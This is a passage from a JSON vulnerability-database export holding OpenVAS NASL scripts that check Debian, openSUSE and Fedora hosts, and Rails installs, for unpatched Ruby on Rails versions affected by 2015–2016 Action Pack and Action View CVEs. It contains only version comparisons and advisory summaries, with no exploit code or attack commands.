script_tag(name:\"affected\", value:\"Ruby on Rails before 3.2.22.1,\n Ruby on Rails 4.0.x and 4.1.x before 4.1.14.1 and\n Ruby on Rails 4.2.x before 4.2.5.1 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.1 or\n 4.1.14.1 or 4.2.5.1, or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/01/25/10\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version_is_less( version: version, test_version: \"3.2.22.1\" ) )\n{\n fix = \"3.2.22.1\";\n VULN = TRUE;\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.1.14.1\" ) )\n {\n fix = \"4.1.14.1\";\n VULN = TRUE;\n }\n}\n\nif( version =~ \"^(4\\.2)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.5.1\" ) )\n {\n fix = \"4.2.5.1\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data:report, port: port);\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:54:04", "description": "Two vulnerabilities have been discovered\nin Rails, a web application framework written in Ruby.
Both vulnerabilities affect\nAction Pack, which handles the web requests for Rails.\n\nCVE-2016-2097Crafted requests to Action View, one of the components of Action Pack,\nmight result in rendering files from arbitrary locations, including\nfiles beyond the application", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3509-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703509", "href": "http://plugins.openvas.org/nasl.php?oid=703509", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3509.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3509-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703509);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-0752\", \"CVE-2016-2097\", \"CVE-2016-2098\");\n script_name(\"Debian Security Advisory DSA 3509-1 (rails - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-03-09 00:00:00 +0100 (Wed, 09 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3509.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"rails on Debian Linux\");\n script_tag(name: \"insight\", value: \"Rails is a full-stack, open-source web\nframework in Ruby for writing real-world applications.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name: 
\"summary\", value: \"Two vulnerabilities have been discovered\nin Rails, a web application framework written in Ruby. Both vulnerabilities affect\nAction Pack, which handles the web requests for Rails.\n\nCVE-2016-2097Crafted requests to Action View, one of the components of Action Pack,\nmight result in rendering files from arbitrary locations, including\nfiles beyond the application's view directory. This vulnerability is\nthe result of an incomplete fix of\nCVE-2016-0752 \n.\nThis bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098 \nIf a web applications does not properly sanitize user inputs, an\nattacker might control the arguments of the render method in a\ncontroller or a view, resulting in the possibility of executing\narbitrary ruby code.\nThis bug was found by Tobias Kraze from Makandra and joernchen of\nPhenoelit.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u2\", 
rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u2\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activejob\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.2.5.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:01", "description": 
"Two vulnerabilities have been discovered\nin Rails, a web application framework written in Ruby. Both vulnerabilities affect\nAction Pack, which handles the web requests for Rails.\n\nCVE-2016-2097Crafted requests to Action View, one of the components of Action Pack,\nmight result in rendering files from arbitrary locations, including\nfiles beyond the application", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3509-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703509", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3509.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3509-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703509\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-0752\", \"CVE-2016-2097\", \"CVE-2016-2098\");\n script_name(\"Debian Security Advisory DSA 3509-1 (rails - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-09 00:00:00 +0100 (Wed, 09 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3509.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"rails on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 2:4.1.8-1+deb8u2.\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name:\"summary\", value:\"Two vulnerabilities have been discovered\nin Rails, a web application framework written 
in Ruby. Both vulnerabilities affect\nAction Pack, which handles the web requests for Rails.\n\nCVE-2016-2097Crafted requests to Action View, one of the components of Action Pack,\nmight result in rendering files from arbitrary locations, including\nfiles beyond the application's view directory. This vulnerability is\nthe result of an incomplete fix of\nCVE-2016-0752\n.\nThis bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n\nCVE-2016-2098\nIf a web applications does not properly sanitize user inputs, an\nattacker might control the arguments of the render method in a\ncontroller or a view, resulting in the possibility of executing\narbitrary ruby code.\nThis bug was found by Tobias Kraze from Makandra and joernchen of\nPhenoelit.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed\nsoftware version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-rails\", 
ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u2\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activejob\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.2.5.2-1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:36:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-20T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for rubygem-actionpack-3_2 (openSUSE-SU-2016:0835-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-2097"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851251", "sourceData": "# 
Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851251\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-20 06:18:10 +0100 (Sun, 20 Mar 2016)\");\n script_cve_id(\"CVE-2016-2097\", \"CVE-2016-2098\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for rubygem-actionpack-3_2 (openSUSE-SU-2016:0835-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionpack-3_2'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for rubygem-actionpack-3_2 fixes the following issues:\n\n - CVE-2016-2097: 
rubygem-actionview: Possible Information Leak\n Vulnerability in Action View. (boo#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (boo#968849)\");\n\n script_tag(name:\"affected\", value:\"rubygem-actionpack-3_2 on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:0835-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.2\")\n{\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-actionpack-3_2\", rpm:\"rubygem-actionpack-3_2~3.2.17~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem-actionpack-3_2-doc\", rpm:\"rubygem-actionpack-3_2-doc~3.2.17~3.10.1\", rls:\"openSUSE13.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-activemodel FEDORA-2016-94", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2016-0752"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807438", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310807438", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-activemodel FEDORA-2016-94\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807438\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-29 06:24:55 +0100 (Mon, 29 Feb 2016)\");\n script_cve_id(\"CVE-2015-7581\", \"CVE-2015-7576\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-0753\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-activemodel FEDORA-2016-94\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-activemodel'\n package(s) announced via the referenced advisory.\");\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-activemodel on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-94\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178043.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-activemodel\", rpm:\"rubygem-activemodel~4.2.0~2.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:11", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-02-29T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionpack FEDORA-2016-94", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2016-0752"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807434", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807434", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionpack FEDORA-2016-94\n#\n# Authors:\n# System 
Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807434\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-29 06:25:03 +0100 (Mon, 29 Feb 2016)\");\n script_cve_id(\"CVE-2015-7581\", \"CVE-2015-7576\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-0753\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionpack FEDORA-2016-94\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionpack'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionpack on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", 
value:\"2016-94\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178042.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionpack\", rpm:\"rubygem-actionpack~4.2.0~3.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:35:18", "description": "Multiple security issues have been\ndiscovered in the Ruby on Rails web application development framework, which may\nresult in denial of service, cross-site scripting, information disclosure or\nbypass of input validation.", "cvss3": {}, "published": "2016-02-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3464-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7577", "CVE-2015-3227", "CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2015-3226", "CVE-2016-0752"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703464", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3464.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3464-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 
